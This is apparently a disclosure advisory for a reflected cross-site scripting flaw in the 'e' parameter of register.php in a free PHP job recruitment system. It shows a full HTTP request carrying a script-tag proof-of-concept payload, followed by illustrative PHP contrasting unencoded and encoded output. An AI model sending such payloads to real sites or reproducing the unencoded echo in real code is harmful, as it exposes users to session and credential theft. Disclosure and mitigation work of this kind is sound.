https://code-projects.org/job-recruitment-in-php-css-javascript-and-mysql-free-download/
register.php
There is a Cross Site Scripting vulnerability in the Job_Recruitment system in register.php. Controlled parameter: $e
A malicious attacker can use this vulnerability to obtain administrator login credentials or to lead users to phishing websites.
The $_POST['e'] parameter of register.php is not filtered and is concatenated into $userstring1, and the value of $userstring1 is then echoed without filtering.
POST /register.php HTTP/1.1
Host: airecruitmentsystem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Contnet-Length: 10
Connection: close
Cookie: PHPSESSID=apdbj581m83cio8cj275e494dr
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 42

e=<script>alert(1);</script>&p1=123456
Result
It can execute the Cross Site Scripting payload: alert(1);
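Mitigation
The pattern described above is closed by HTML-encoding the value at the point where it is echoed. The PHP below is an added example, not the project's register.php source: the function names, the h() helper and the message text are assumptions, and only $_POST['e'], $userstring1 and the request body are taken from this advisory.

```php
<?php
// Added example: reconstructs the pattern the advisory describes.
// It is NOT the project's actual register.php code.

// Vulnerable shape: the request value is concatenated into $userstring1
// and the result is written to the page without any encoding.
function render_vulnerable(array $post): string
{
    $e = $post['e'] ?? '';
    $userstring1 = 'Registered user: ' . $e; // message text is an assumption
    return $userstring1;
}

// Output encoder for the HTML body and quoted-attribute contexts.
// ENT_QUOTES encodes both quote characters; ENT_SUBSTITUTE replaces
// invalid UTF-8 sequences instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened shape: same concatenation, but the untrusted value is encoded
// when it is placed into the HTML output.
function render_hardened(array $post): string
{
    $e = $post['e'] ?? '';
    if (!is_string($e)) {
        // A body such as e[]=x reaches PHP as an array; treat it as empty.
        $e = '';
    }
    $userstring1 = 'Registered user: ' . h($e);
    return $userstring1;
}

// Constructed input mirroring the request body shown in the advisory.
$post = ['e' => '<script>alert(1);</script>', 'p1' => '123456'];

echo render_vulnerable($post), PHP_EOL; // markup reaches the browser intact
echo render_hardened($post), PHP_EOL;   // markup is emitted as inert entities
```

Encoding belongs at the echo, not at input time, so that every place the value is printed is covered regardless of how it was stored or passed along.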
Discover
Xidian University: Li Teng (李腾), Xie Yaxuan (谢亚轩)